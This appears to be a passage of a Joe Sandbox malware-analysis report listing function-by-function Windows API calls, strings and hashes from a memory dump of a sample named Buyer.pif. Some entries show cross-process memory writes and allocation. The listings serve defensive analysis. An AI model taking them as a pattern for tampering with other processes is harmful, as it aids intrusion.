                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB0A36
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00FA6351
                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FA6368
                                                                                                    • MessageBeep.USER32(00000000), ref: 00FA6380
                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00FA639C
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00FA63B6
                                                                                                    Similarity
                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3741023627-0
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00F7DAA3
                                                                                                      • Part of subcall function 00F72D18: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4), ref: 00F72D2E
                                                                                                      • Part of subcall function 00F72D18: GetLastError.KERNEL32(01011DB4,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4,01011DB4), ref: 00F72D40
                                                                                                    • _free.LIBCMT ref: 00F7DAB5
                                                                                                    • _free.LIBCMT ref: 00F7DAC7
                                                                                                    • _free.LIBCMT ref: 00F7DAD9
                                                                                                    • _free.LIBCMT ref: 00F7DAEB
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00F7257E
                                                                                                      • Part of subcall function 00F72D18: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4), ref: 00F72D2E
                                                                                                      • Part of subcall function 00F72D18: GetLastError.KERNEL32(01011DB4,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4,01011DB4), ref: 00F72D40
                                                                                                    • _free.LIBCMT ref: 00F72590
                                                                                                    • _free.LIBCMT ref: 00F725A3
                                                                                                    • _free.LIBCMT ref: 00F725B4
                                                                                                    • _free.LIBCMT ref: 00F725C5
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    APIs
                                                                                                    • EndPath.GDI32(?), ref: 00F5980A
                                                                                                    • StrokeAndFillPath.GDI32(?,?,00F97807,00000000,?,?,?), ref: 00F59826
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00F59839
                                                                                                    • DeleteObject.GDI32 ref: 00F5984C
                                                                                                    • StrokePath.GDI32(?), ref: 00F59867
                                                                                                    Similarity
                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                    • String ID:
                                                                                                    • API String ID: 2625713937-0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: __freea$_free
                                                                                                    • String ID: a/p$am/pm
                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F60592: EnterCriticalSection.KERNEL32(010116FC,?,?,?,00F4C0BA,01013560,01012408,00000001,00000000,CMDLINERAW,?,01012408,?,?,?,00000000), ref: 00F6059D
                                                                                                      • Part of subcall function 00F60592: LeaveCriticalSection.KERNEL32(010116FC,?,?,?,00F4C0BA,01013560,01012408,00000001,00000000,CMDLINERAW,?,01012408,?,?,?,00000000), ref: 00F605DA
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00F603F3: __onexit.LIBCMT ref: 00F603F9
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00FC8382
                                                                                                      • Part of subcall function 00F60548: EnterCriticalSection.KERNEL32(010116FC,?,?,00F4C0E8,01013560,00F82799,01012408,00000001,00000000,CMDLINERAW,?,01012408,?,?,?,00000000), ref: 00F60552
                                                                                                      • Part of subcall function 00F60548: LeaveCriticalSection.KERNEL32(010116FC,?,00F4C0E8,01013560,00F82799,01012408,00000001,00000000,CMDLINERAW,?,01012408,?,?,?,00000000), ref: 00F60585
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                    • API String ID: 535116098-3733170431
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FABB04: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FA28B2,?,?,00000034,00000800,?,00000034), ref: 00FABB2E
                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FA2E42
                                                                                                      • Part of subcall function 00FABACF: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FA28E1,?,?,00000800,?,00001073,00000000,?,?), ref: 00FABAF9
                                                                                                      • Part of subcall function 00FABA2B: GetWindowThreadProcessId.USER32(?,?), ref: 00FABA56
                                                                                                      • Part of subcall function 00FABA2B: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FA2876,00000034,?,?,00001004,00000000,00000000), ref: 00FABA66
                                                                                                      • Part of subcall function 00FABA2B: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FA2876,00000034,?,?,00001004,00000000,00000000), ref: 00FABA7C
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FA2EAF
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FA2EFC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                    • String ID: @
                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                    • Opcode ID: ab13faa36b067a4b6487c91aa0594f66c0ef86e604a95c47cd517e4d476550e4
                                                                                                    • Instruction ID: 81f640a9033d074d3ebab92d95c0820b9ab11922ec546ba3a7df8b89a5a0350f
                                                                                                    • Opcode Fuzzy Hash: ab13faa36b067a4b6487c91aa0594f66c0ef86e604a95c47cd517e4d476550e4
                                                                                                    • Instruction Fuzzy Hash: D2415CB2A0021CAFDB10DFA4CD85ADEBBB8EF46300F004095FA45B7191DB756E85DBA0
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\447331\Buyer.pif,00000104), ref: 00F71A29
                                                                                                    • _free.LIBCMT ref: 00F71AF4
                                                                                                    • _free.LIBCMT ref: 00F71AFE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                    • API String ID: 2506810119-939020992
                                                                                                    • Opcode ID: f02e0f5cac3d75d23b9151821d2cb157a79dbddf47895ece052ebb84ee637edc
                                                                                                    • Instruction ID: f73576d58320a008b3ab1a8df93a876a631811bb65c3d8a369812b03f6b819e0
                                                                                                    • Opcode Fuzzy Hash: f02e0f5cac3d75d23b9151821d2cb157a79dbddf47895ece052ebb84ee637edc
                                                                                                    • Instruction Fuzzy Hash: 89315071E41218AFEB21DF9D9C85D9EBBBCFF85310B208167E44897201D6788E45EB92
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FAC8EB
                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00FAC931
                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,010129B0,01076358), ref: 00FAC97A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 135850232-4108050209
                                                                                                    • Opcode ID: 29b1feffd6cbec1abeb1bd49e066e7c61e5c45015a0d5a15087dddfe57e5d898
                                                                                                    • Instruction ID: 3a3f60ae0ebe5d405ce7012bc527ab25bc0ad59d303ba2837ddd47bf9b705c93
                                                                                                    • Opcode Fuzzy Hash: 29b1feffd6cbec1abeb1bd49e066e7c61e5c45015a0d5a15087dddfe57e5d898
                                                                                                    • Instruction Fuzzy Hash: 4741C0B16083019FD720DF24CC84F1BBBE8AF8A364F14461DF8A597291D734A905DBA6
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FDDC1C,00000000,?,?,?,?), ref: 00FD4C6A
                                                                                                    • GetWindowLongW.USER32 ref: 00FD4C87
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FD4C97
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long
                                                                                                    • String ID: SysTreeView32
                                                                                                    • API String ID: 847901565-1698111956
                                                                                                    • Opcode ID: eb23d08686224351ca632d18d34b90dd05a1793b385f749a813554249c417940
                                                                                                    • Instruction ID: 9349eaafdc05712f10834a20ff69dc93c8d38c25e3f607fbb7edcf161b0804a7
                                                                                                    • Opcode Fuzzy Hash: eb23d08686224351ca632d18d34b90dd05a1793b385f749a813554249c417940
                                                                                                    • Instruction Fuzzy Hash: 9231C231511609AFDB118F38CC45BEA7BAAEB04334F254716F979932D0D774EC51AB50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FC3AE2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00FC37FE,?,?), ref: 00FC3AFF
                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FC3801
                                                                                                    • _wcslen.LIBCMT ref: 00FC3822
                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00FC388D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                    • String ID: 255.255.255.255
                                                                                                    • API String ID: 946324512-2422070025
                                                                                                    • Opcode ID: a583838d9a36d7ee6742bdbed8c82fe52bc2610cb2d5abf4d46b66b6e7f10236
                                                                                                    • Instruction ID: 6f9fd2f3f5c269dde00a534781f029b35cc60058b8dee995cf8da383229266a7
                                                                                                    • Opcode Fuzzy Hash: a583838d9a36d7ee6742bdbed8c82fe52bc2610cb2d5abf4d46b66b6e7f10236
                                                                                                    • Instruction Fuzzy Hash: 3531A036A00202DFCB10DF68C686F6977A1AF553A4F24C059F8168B7E2D735EE45EB60
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FD46FE
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FD4712
                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FD4736
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window
                                                                                                    • String ID: SysMonthCal32
                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                    • Opcode ID: acdf356654f0a76def62b26564f2d23c38f39bcdfb6b3503c0f71e8bd0ff5324
                                                                                                    • Instruction ID: 30a24bc2819776e1a2f1dca4e854eacdc38b4758deaed414fb7a236d792b0b23
                                                                                                    • Opcode Fuzzy Hash: acdf356654f0a76def62b26564f2d23c38f39bcdfb6b3503c0f71e8bd0ff5324
                                                                                                    • Instruction Fuzzy Hash: F8219F32500218ABDF118FA0CC42FEA3BAAFF49724F150215FA596B1D0D6B5F855AB90
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FD4EC5
                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FD4ED3
                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FD4EDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                    • String ID: msctls_updown32
                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                    • Opcode ID: 6b99b31afc6afb36fe41217e0b95ec62a91ba46ef669876458b920a0e00c193f
                                                                                                    • Instruction ID: 60eb1dff005567f9f522cd11df6b4edc4e15ae24b9c5980429eb558ae7ae9f9c
                                                                                                    • Opcode Fuzzy Hash: 6b99b31afc6afb36fe41217e0b95ec62a91ba46ef669876458b920a0e00c193f
                                                                                                    • Instruction Fuzzy Hash: 2D212CB5600209AFDB10DF68DC81DAB37AEFB493A4B14005AF9019B351CB75EC11AA60
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00FB5177
                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FB51CB
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00FDDC1C), ref: 00FB523F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                    • String ID: %lu
                                                                                                    • API String ID: 2507767853-685833217
                                                                                                    • Opcode ID: 047e01ce93f2c5955c7e1b1934d1de9456f9fd76896f2468685dd62c5176ccd4
                                                                                                    • Instruction ID: 0908d01f7af0ba1dc54c8eb3ea4fb18e27a92df0b13e34fa5a0245d33ed3680c
                                                                                                    • Opcode Fuzzy Hash: 047e01ce93f2c5955c7e1b1934d1de9456f9fd76896f2468685dd62c5176ccd4
                                                                                                    • Instruction Fuzzy Hash: 0E318171A00208AFDB10DF64C985EAA7BF8EF08304F144095F809DB352D775EE46DB61
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FD4A0F
                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FD4A24
                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FD4A31
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: msctls_trackbar32
                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                    • Opcode ID: 0faaf2fe5a39f5960b0eed0cc52ff6e089886f86ef0d93c018b86daa539d50f6
                                                                                                    • Instruction ID: 98167ab7685bbd92d02e67d2f8f3d69acdcb16813a5f85979ba39eb6ebeb832f
                                                                                                    • Opcode Fuzzy Hash: 0faaf2fe5a39f5960b0eed0cc52ff6e089886f86ef0d93c018b86daa539d50f6
                                                                                                    • Instruction Fuzzy Hash: D8113631680208BFEF205E25CC46FEB3BADEF85B64F010115FA55E72A0D275EC51AB10
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                      • Part of subcall function 00FA3489: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00FA34A7
                                                                                                      • Part of subcall function 00FA3489: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA34B8
                                                                                                      • Part of subcall function 00FA3489: GetCurrentThreadId.KERNEL32 ref: 00FA34BF
                                                                                                      • Part of subcall function 00FA3489: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00FA34C6
                                                                                                    • GetFocus.USER32 ref: 00FA3659
                                                                                                      • Part of subcall function 00FA34D0: GetParent.USER32(00000000), ref: 00FA34DB
                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00FA36A4
                                                                                                    • EnumChildWindows.USER32(?,00FA371C), ref: 00FA36CC
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                    • String ID: %s%d
                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                    • Opcode ID: 006a435521a42bee4dbf3e0510290244b028f77890ef0385b5080d003b5cd603
                                                                                                    • Instruction ID: b4bcdd8b0c7fa7f66c96b826feeca346d253f3a072ba487153cacace40e0c295
                                                                                                    • Opcode Fuzzy Hash: 006a435521a42bee4dbf3e0510290244b028f77890ef0385b5080d003b5cd603
                                                                                                    • Instruction Fuzzy Hash: 6611BBF1600209ABCF12BFB08C85EEE3B6A9F45304F044075FD099B292DB749A45AB70
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FD6081
                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FD60AE
                                                                                                    • DrawMenuBar.USER32(?), ref: 00FD60BD
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                    • Opcode ID: 81d81b05a5bf5725de4ab4d4a4342806c02f3d2e76875de2ac9724686a501601
                                                                                                    • Instruction ID: 672141e50c47878ebef755d3a419e30a59cf96fd34aaa4ef87ca7364f812ad59
                                                                                                    • Opcode Fuzzy Hash: 81d81b05a5bf5725de4ab4d4a4342806c02f3d2e76875de2ac9724686a501601
                                                                                                    • Instruction Fuzzy Hash: C9015B72500218EFDB219F60DC48BAE7BB6FF45750F188096E849D6250DB318984FF21
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c2256266b927ae8407ed22e2ab98ac0ae87d853954d45359080c61c07a955ef8
                                                                                                    • Instruction ID: 135e0cd2e20bdf6c6afd0383d831694df141846da7bc0e2bd8d883f27b2ad2e0
                                                                                                    • Opcode Fuzzy Hash: c2256266b927ae8407ed22e2ab98ac0ae87d853954d45359080c61c07a955ef8
                                                                                                    • Instruction Fuzzy Hash: B3C17EB5A00206EFDB04CFA4D884EAEB7B9FF49314F108598E405EB251DB35EE41EB90
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 9ad14dec4bb4a0c2043c4c5fa7c098021884fe155f7a13ee0405fd2ef3dcf7e8
                                                                                                    • Instruction ID: 07214de47a6db19710bdcd1810529e6f74dac4e2d4b0f300c9092ea88871190c
                                                                                                    • Opcode Fuzzy Hash: 9ad14dec4bb4a0c2043c4c5fa7c098021884fe155f7a13ee0405fd2ef3dcf7e8
                                                                                                    • Instruction Fuzzy Hash: 40A14932D043869FDB11CF58C8917AEBBE5EF51320F14816EE99D9B282C338A941F752
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1998397398-0
                                                                                                    • Opcode ID: 1181acc30504e332dd219ba93af46426bd6768cc86b6be821eac9d15511a5951
                                                                                                    • Instruction ID: b51ca1b8275ccfe7844d873a3fc60c588841f9e1e1afedba96a504ad518d3815
                                                                                                    • Opcode Fuzzy Hash: 1181acc30504e332dd219ba93af46426bd6768cc86b6be821eac9d15511a5951
                                                                                                    • Instruction Fuzzy Hash: 8EA118756143119FC700EF28C986E2ABBE5BF88750F04855DF98A9B361CB34ED05EB92
                                                                                                    APIs
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FE0BF0,?), ref: 00FA0C77
                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FE0BF0,?), ref: 00FA0C8F
                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00FDDC2C,000000FF,?,00000000,00000800,00000000,?,00FE0BF0,?), ref: 00FA0CB4
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00FA0CD5
                                                                                                    Similarity
                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 314563124-0
                                                                                                    • Opcode ID: 0757dddaeaf05e36a33db44f1ec7c1e2414922e4a5f6e0ebf25eb892f573858e
                                                                                                    • Instruction ID: 9b5a27ef111583ab99bef90b7519500ff640619db77543ebac5f1ca3f8383aac
                                                                                                    • Opcode Fuzzy Hash: 0757dddaeaf05e36a33db44f1ec7c1e2414922e4a5f6e0ebf25eb892f573858e
                                                                                                    • Instruction Fuzzy Hash: 488109B5A00109EFCB04DF94D988EEEB7B9FF89315F204558E506EB250DB71AE06DB60
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00FCAE33
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00FCAE41
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00FCAF23
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCAF32
                                                                                                      • Part of subcall function 00F5E224: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F83B5C,?), ref: 00F5E24E
                                                                                                    Similarity
                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1991900642-0
                                                                                                    • Opcode ID: 9deb0a5147b38af7b26485a75fd7067427febcade5c2094f36c07ed6f8d18359
                                                                                                    • Instruction ID: 4b46850398c636c53b0ee072dad4f68722c2c738e52dd348eaba675906f07296
                                                                                                    • Opcode Fuzzy Hash: 9deb0a5147b38af7b26485a75fd7067427febcade5c2094f36c07ed6f8d18359
                                                                                                    • Instruction Fuzzy Hash: 6B5118B1508315AFD350EF24CC86A6BBBE8FF89714F00491DF98997291EB34E904DB92
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 0b9b53efca81dba3286dac6710ed84cc021bc74dad07afc1ab39c522f9a65038
                                                                                                    • Instruction ID: 26c7abbdcf8f0e934c8f39d458459e21839129e2c95cfa58610116377e340a50
                                                                                                    • Opcode Fuzzy Hash: 0b9b53efca81dba3286dac6710ed84cc021bc74dad07afc1ab39c522f9a65038
                                                                                                    • Instruction Fuzzy Hash: 0D41E532E00105AAEB257E7D8C86AEE3BADFF46770F14471AF418D6291D7784842B762
                                                                                                    APIs
                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00FC2284
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC2292
                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00FC2311
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC231B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$socket
                                                                                                    • String ID:
                                                                                                    • API String ID: 1881357543-0
                                                                                                    • Opcode ID: 46495bc11dd69a6c52d05b21ff11103534b61c01ddce8dcadefa2139bad9587a
                                                                                                    • Instruction ID: ecdfbbf5c1bc95338832b73fd74524005ca23abf441ee9f8b459f198ebbfd0f9
                                                                                                    • Opcode Fuzzy Hash: 46495bc11dd69a6c52d05b21ff11103534b61c01ddce8dcadefa2139bad9587a
                                                                                                    • Instruction Fuzzy Hash: 9F41B534600301AFE720AF24CC86F2A7BD5EB44718F54848CF91A9F2D2D776DD41AB90
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(0107D510,?), ref: 00FD6A3B
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FD6A6E
                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00FD6ADB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3880355969-0
                                                                                                    • Opcode ID: 7e5fa058e5398259e54762f557e8360b866eb3cd602c876bc8530f0db663b1b2
                                                                                                    • Instruction ID: 328aa9d08c7e3d9bffdccf8c79b34cf5024b05b68d6c9f610d99170a5ece7bed
                                                                                                    • Opcode Fuzzy Hash: 7e5fa058e5398259e54762f557e8360b866eb3cd602c876bc8530f0db663b1b2
                                                                                                    • Instruction Fuzzy Hash: 90512D35A00209AFCB25DF68C980AAE7BB6FB85364F14815AF855D7390D734ED41EB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e3e329e5b5e9403103a2259e9536f7113cfd9814d0c7c2817967a09a042ea5c5
                                                                                                    • Instruction ID: dfce8452fc20bf8d92969b54d64c2c015bad4faeeb3d050cf0dbd31bc89f83a4
                                                                                                    • Opcode Fuzzy Hash: e3e329e5b5e9403103a2259e9536f7113cfd9814d0c7c2817967a09a042ea5c5
